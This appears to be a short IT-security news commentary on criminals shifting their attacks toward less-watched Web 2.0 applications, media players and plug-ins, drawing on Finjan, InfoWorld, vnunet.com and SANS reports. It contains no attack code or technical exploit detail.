IT and security departments should pay attention to a assessment by security company Finjan that criminals are increasingly targeting Web applications that aren't generally thought of as security risks. These include chat programs, content-management systems, discussion forums, media players and others, this vnunet.com piece says.
This is a lesser-known element as criminals broaden their sights beyond their traditional haunts. It makes perfect sense: Web 2.0 applications open the playing field to innovative applications. Many of these rely on letting more data flow in every direction. Some of this traffic, of course, can hide bugs. In addition, more code -- both in total amount and in the percentage of the whole -- is not securely written. Short version: The Internet is a free-for-all, conditions that are perfect for clever crackers.
The story says companies generally keep patches on Microsoft software up to date, but don't think twice about many other programs. The truism about cyber criminals is that they follow the money and tend to attack where resistance is lowest. This makes attacking these applications almost inevitable. Additionally, the story says, bug-tracking sites such as BugTraq and @Risk don't follow these applications, making the fight against hackers less efficient.
The broadening array of things that are under attack is well documented in this InfoWorld commentary. The writer says application vulnerabilities are being exploited in Apple QuickTime, Macromedia Flash, YouTube videos, Adobe Acrobat, Microsoft Office and others.
More Web-based vulnerabilities are noted in this vnunet.com piece on Microsoft's most recent "patch Tuesday." One of the bugs labeled "critical" affects DirectShow, which the story describes as a "common interface for media across various programming languages." It includes DirectX plug-ins for video playback and is distributed in Microsoft's Platform SDK. DirectShow is used in Windows Media Player, the story says.
Late last month, the SANS Institute said it was set to name its top 20 risks of the past year. In that release, it noted that criminals are shifting their focus. In the past, they attacked the most commonly used software. This year, the focus has shifted in two directions: Criminals are focusing on phishing and its variants, and on attacking customer applications. (The list of top 20 attacks -- with links to explanations of each one -- is available here.)
The bottom line is that the world of hackers is broadening in parallel with the rise of interactive, more open applications. Security staffs must be aware of the trend and address it, starting with well designed and written code.